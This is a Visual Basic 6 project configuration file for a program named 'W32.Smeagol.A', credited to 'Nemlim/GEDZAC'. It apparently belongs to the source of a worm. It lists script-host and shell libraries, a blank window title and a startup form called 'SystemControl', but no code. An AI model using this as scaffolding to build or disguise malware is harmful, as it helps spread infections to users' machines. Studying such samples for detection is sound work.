Type=Exe
Reference=*\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#D:\WINDOWS\SYSTEM\SCRRUN.DLL#Microsoft Scripting Runtime
Reference=*\G{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}#1.0#0#D:\WINDOWS\SYSTEM\SHDOC401.DLL#Microsoft Shell Controls And Automation
Reference=*\G{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}#1.0#0#D:\WINDOWS\SYSTEM\WSHOM.OCX#Windows Script Host Object Model (Ver 1.0)
Form=Form1.frm
Module=Module1; Module1.bas
Class=cQueryReg; cQueryReg.cls
IconForm="SystemControl"
Startup="SystemControl"
HelpFile=""
Title=" "
ExeName32="Smeagol.exe"
Command32=""
Name="Project1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="Design By Nemlim/GEDZAC"
VersionCompanyName="http://www.gedzac.tk"
VersionFileDescription="W32.Smeagol.A"
VersionLegalCopyright="Gedzac®"
VersionLegalTrademarks="Permitida su reproducción total o parcial , de cualquier tipo y con cualquier propósito o destino."
VersionProductName="W32.Smeagol.A"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
